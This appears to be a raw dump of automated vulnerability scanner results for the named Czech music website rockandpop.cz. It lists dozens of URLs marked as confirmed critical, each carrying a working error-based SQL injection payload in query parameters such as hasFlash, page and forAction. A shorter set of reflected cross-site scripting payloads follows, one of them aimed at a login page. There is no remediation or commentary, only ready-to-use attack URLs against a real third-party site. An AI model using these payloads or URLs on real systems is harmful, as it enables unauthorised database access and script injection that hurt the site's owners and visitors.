- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ImpactSeverity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/foto/upload/?forAction='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: forAction
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/newsletter/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confinmation: Confirmed
- URL: http://www.rockandpop.cz/newsletter/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/login.php?'"--></style></script><script>alert(0x0000BE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0000BE)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/?'"--></style></script><script>alert(0x0000E0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0000E0)</script>
- Impact
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/?'"--></style></script><script>alert(0x0000DB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0000DB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/?'"--></style></script><script>alert(0x00011E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00011E)</script>
- ImpactSeverity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/?'"--></style></script><script>alert(0x00011F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00011F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/casopis/?'"--></style></script><script>alert(0x000123)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000123)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/?'"--></style></script><script>alert(0x000125)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000125)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/?'"--></style></script><script>alert(0x000128)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000128)</script>
- Severity: Important
- Confirmation: Confirmed
